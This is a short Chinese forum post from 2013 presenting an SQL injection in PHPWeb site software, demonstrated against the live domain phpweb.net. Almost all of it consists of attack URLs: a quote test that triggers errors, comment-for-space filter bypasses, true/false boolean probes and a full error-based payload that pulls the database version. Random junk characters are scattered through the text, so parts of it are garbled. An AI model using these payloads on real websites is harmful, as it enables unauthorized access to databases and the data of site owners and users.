phpweb所有的整站程序伪静态页面都存在sql注入
' m# `5 d; P! _' M9 T6 _7 J5 q: b$ _/ i' O
主站:http://phpweb.net/
- d% R& r) Y5 S' b1 g. i' c加’检测:
+ p c3 O8 P$ ~+ l; f/ ~
" V9 I3 Z. E) X8 G- _http://www.phpweb.net/down/html/?772′.html
) E2 E, j5 |) r6 T/ |2 F! | & u* {1 M* P) F r S9 ]; G
出错$ [% y2 b( b8 ?/ h" R" a" x, \' J
存在注入。
9 r3 k- } M6 O* y2 ~ O% y不能用空格,只能用/*罗5 }1 Z8 y5 P5 b j9 P: b7 u
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
) t' J7 f* n) ? f8 o- ~ 5 z# w0 ?5 } g' ^
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
9 ^3 U+ M) ]7 Q爆数据库版本:% r4 x. D" U$ i
. X9 r& r: j' T+ E0 [' _( @?
2 X* P' V: Q, ~1 o9 P( w g8 T# J14 M3 n/ t! S8 P4 ^' s: ?$ A
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
7 O" x$ k4 |, k$ C更新日期: 2013-01-03 13:39:50
* V: }; @' c* e t& h$ e6 a% H |
发表于 2013-1-4 19:46:42
收藏
支持
反对